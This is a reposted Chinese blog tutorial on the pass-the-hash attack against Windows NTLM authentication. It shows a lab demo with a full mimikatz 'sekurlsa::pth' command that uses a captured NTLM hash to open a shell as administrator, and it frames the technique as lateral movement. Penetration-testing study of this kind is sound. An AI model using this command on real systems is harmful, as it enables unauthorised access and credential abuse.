码迷,mamicode.com
首页 > 其他好文 > 详细

哈希传递PTH(pass the hash)

时间:2019-10-24 00:35:45      阅读:548      评论:0      收藏:0      [点我收藏+]

标签:mini   内网渗透   use   密码   成功   禁用   方式   logo   ash   

pass the hash原理:

在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。

从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash,如果攻击者获得了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)


这类攻击适用于:

域/工作组环境

演示:

靶机:win08 r2
攻击:win08 r2

1.靶机中进行读取NTLM HASH:
技术图片

2.攻击机执行:

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:top.pentest.top /ntlm:044dfa0c35b979ed369f7335b5ea20e0"

技术图片

会反弹一个cmd窗口回来 发现hash成功传递!!!


总结:在内网渗透中,当我们能够读取ntlm,但是发现抓取不到明文的时候,可以通过hash传递的方式进行横向移动。

对于哈希传递不只是通过mimikatz,还可以通过wce,impacket工具包进行攻击。

哈希传递PTH(pass the hash)

标签:mini   内网渗透   use   密码   成功   禁用   方式   logo   ash   

原文地址:https://www.cnblogs.com/zpchcbd/p/11729691.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!